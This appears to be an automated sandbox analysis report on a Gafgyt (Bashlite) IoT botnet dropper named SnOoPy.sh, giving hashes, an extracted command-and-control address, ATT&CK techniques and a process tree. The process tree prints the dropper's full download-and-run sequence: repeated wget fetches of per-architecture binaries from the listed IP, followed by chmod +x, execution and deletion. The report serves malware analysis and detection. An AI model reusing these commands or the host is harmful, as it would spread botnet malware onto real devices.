gafgyt | 14dfc408f3fda9e5b1c91f656d73e75f11542c8cc7e19e5fc0e8de75f4a268ec

Analysis

max time kernel
94s
max time network
98s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11/03/2025, 04:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SnOoPy.sh
Size

2KB
MD5

980a26ba1cafc1b1fc7ee497f219ccea
SHA1

835b08cb3df398f7657d2841bc0de5de3efd6484
SHA256

14dfc408f3fda9e5b1c91f656d73e75f11542c8cc7e19e5fc0e8de75f4a268ec
SHA512

037024c89954c83d63bcbc1be518e7b4a19ade021027dcdeea928a8c35da01528ca4ae8713b863a643fd8ae8dabfcb5198c6d9f7df39df29c009f733149cc41a

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

154.127.56.114:23

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
690	chmod
696	chmod
700	chmod
706	chmod
712	chmod
744	chmod
681	chmod
720	chmod
728	chmod
736	chmod
752	chmod
759	chmod
669	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/a-r.m-6.SNOOPY	701	SnOoPy.sh

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-6.SNOOPY

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	a-r.m-6.SNOOPY

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/a-r.m-6.SNOOPY	wget

/tmp/SnOoPy.sh
/tmp/SnOoPy.sh
1⤵
- Executes dropped EXE
PID:654
- /usr/bin/wget
  wget http://154.127.56.114/m-i.p-s.SNOOPY
  2⤵
  PID:661
- /bin/chmod
  chmod +x m-i.p-s.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:669
- /tmp/m-i.p-s.SNOOPY
  ./m-i.p-s.SNOOPY
  2⤵
  PID:671
- /bin/rm
  rm -rf m-i.p-s.SNOOPY
  2⤵
  PID:672
- /usr/bin/wget
  wget http://154.127.56.114/m-p.s-l.SNOOPY
  2⤵
  PID:675
- /bin/chmod
  chmod +x m-p.s-l.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:681
- /tmp/m-p.s-l.SNOOPY
  ./m-p.s-l.SNOOPY
  2⤵
  PID:683
- /bin/rm
  rm -rf m-p.s-l.SNOOPY
  2⤵
  PID:684
- /usr/bin/wget
  wget http://154.127.56.114/s-h.4-.SNOOPY
  2⤵
  PID:686
- /bin/chmod
  chmod +x s-h.4-.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:690
- /tmp/s-h.4-.SNOOPY
  ./s-h.4-.SNOOPY
  2⤵
  PID:691
- /bin/rm
  rm -rf s-h.4-.SNOOPY
  2⤵
  PID:692
- /usr/bin/wget
  wget http://154.127.56.114/x-8.6-.SNOOPY
  2⤵
  PID:694
- /bin/chmod
  chmod +x x-8.6-.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:696
- /tmp/x-8.6-.SNOOPY
  ./x-8.6-.SNOOPY
  2⤵
  PID:697
- /bin/rm
  rm -rf x-8.6-.SNOOPY
  2⤵
  PID:698
- /usr/bin/wget
  wget http://154.127.56.114/a-r.m-6.SNOOPY
  2⤵
  - Writes file to tmp directory
  PID:699
- /bin/chmod
  chmod +x a-r.m-6.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:700
- /tmp/a-r.m-6.SNOOPY
  ./a-r.m-6.SNOOPY
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:701
- /bin/rm
  rm -rf a-r.m-6.SNOOPY
  2⤵
  PID:704
- /usr/bin/wget
  wget http://154.127.56.114/x-3.2-.SNOOPY
  2⤵
  PID:705
- /bin/chmod
  chmod +x x-3.2-.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:706
- /tmp/x-3.2-.SNOOPY
  ./x-3.2-.SNOOPY
  2⤵
  PID:707
- /bin/rm
  rm -rf x-3.2-.SNOOPY
  2⤵
  PID:708
- /usr/bin/wget
  wget http://154.127.56.114/a-r.m-7.SNOOPY
  2⤵
  PID:709
- /bin/chmod
  chmod +x a-r.m-7.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:712
- /tmp/a-r.m-7.SNOOPY
  ./a-r.m-7.SNOOPY
  2⤵
  PID:713
- /bin/rm
  rm -rf a-r.m-7.SNOOPY
  2⤵
  PID:714
- /usr/bin/wget
  wget http://154.127.56.114/p-p.c-.SNOOPY
  2⤵
  PID:716
- /bin/chmod
  chmod +x p-p.c-.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /tmp/p-p.c-.SNOOPY
  ./p-p.c-.SNOOPY
  2⤵
  PID:721
- /bin/rm
  rm -rf p-p.c-.SNOOPY
  2⤵
  PID:722
- /usr/bin/wget
  wget http://154.127.56.114/i-5.8-6.SNOOPY
  2⤵
  PID:724
- /bin/chmod
  chmod +x i-5.8-6.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:728
- /tmp/i-5.8-6.SNOOPY
  ./i-5.8-6.SNOOPY
  2⤵
  PID:729
- /bin/rm
  rm -rf i-5.8-6.SNOOPY
  2⤵
  PID:730
- /usr/bin/wget
  wget http://154.127.56.114/m-6.8-k.SNOOPY
  2⤵
  PID:731
- /bin/chmod
  chmod +x m-6.8-k.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/m-6.8-k.SNOOPY
  ./m-6.8-k.SNOOPY
  2⤵
  PID:737
- /bin/rm
  rm -rf m-6.8-k.SNOOPY
  2⤵
  PID:738
- /usr/bin/wget
  wget http://154.127.56.114/p-p.c-.SNOOPY
  2⤵
  PID:739
- /bin/chmod
  chmod +x p-p.c-.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/p-p.c-.SNOOPY
  ./p-p.c-.SNOOPY
  2⤵
  PID:745
- /bin/rm
  rm -rf p-p.c-.SNOOPY
  2⤵
  PID:746
- /usr/bin/wget
  wget http://154.127.56.114/a-r.m-4.SNOOPY
  2⤵
  PID:747
- /bin/chmod
  chmod +x a-r.m-4.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/a-r.m-4.SNOOPY
  ./a-r.m-4.SNOOPY
  2⤵
  PID:753
- /bin/rm
  rm -rf a-r.m-4.SNOOPY
  2⤵
  PID:754
- /usr/bin/wget
  wget http://154.127.56.114/a-r.m-5.SNOOPY
  2⤵
  PID:755
- /bin/chmod
  chmod +x a-r.m-5.SNOOPY
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /tmp/a-r.m-5.SNOOPY
  ./a-r.m-5.SNOOPY
  2⤵
  PID:760
- /bin/rm
  rm -rf a-r.m-5.SNOOPY
  2⤵
  PID:762

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-6.SNOOPY

Filesize
108KB

MD5
e7748189201994e7b6024eafd747e4d2

SHA1
d78148781e6fe3b3b1a371eecaeadbfa58407ddc

SHA256
263f1b3b46782a3ccc4b016ff6697e7b6efcd044ee6218c77881cf98206003a2

SHA512
ded3aa06d6c9873561293fd8978c1142aabf3794aa4610b72a68d338c7f06047cf64519254965e74c8b8426e6128a81331f5a66b504913cadfe689228640487f

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads